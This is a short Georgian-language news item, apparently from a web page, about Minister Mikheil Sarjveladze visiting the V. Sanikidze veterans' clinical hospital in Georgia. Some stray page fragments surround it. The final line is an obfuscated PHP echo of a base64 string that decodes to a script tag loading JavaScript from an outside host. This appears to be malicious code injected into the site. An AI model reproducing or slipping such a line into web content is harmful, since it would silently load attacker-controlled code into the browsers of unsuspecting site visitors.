celsiusi
ავერსი შნაიდერი

ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრმა მიხეილ სარჯველაძემ, ვ.სანიკიძის სახელობის ვეტერანთა კლინიკური ჰოსპიტალი დაათვალიერა.

უწყების ხელმძღვანელი, ადგილზე, გაეცნო ჰოსპიტლის მუშაობის სპეციფიკას და აღნიშნა, რომ ვეტერანებზე ზრუნვა და მათი სამედიცინო მომსახურებით უზრუნველყოფა სამინისტროს ერთ-ერთი მთავარი პრიორიტეტია. ამასთან, მიხეილ სარჯველაძემ, სამედიცინო პერსონალს, გაწეული სამსახურისთვის, მადლობა გადაუხადა.

ვეტერანთა კლინიკური ჰოსპიტალი, ბენეფიციარებს, პირველადი ჯანდაცვის სამედიცინო მომსახურებით უზრუნველყოს. სამედიცინო დაწესებულება თანამედროვე აპარატურითა და კვალიფიციური კადრებითაა აღჭურვილი.

მიხეილ სარჯველაძეს, ჰოსპიტალში, ვეტერანების საქმეთა სახელმწიფო სამსახურის დირექტორმა კობა კობალაძემ და ჰოსპიტლის ხელმძღვანელმა ამორი რევიშვილმა უმასპინძლეს.

153
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");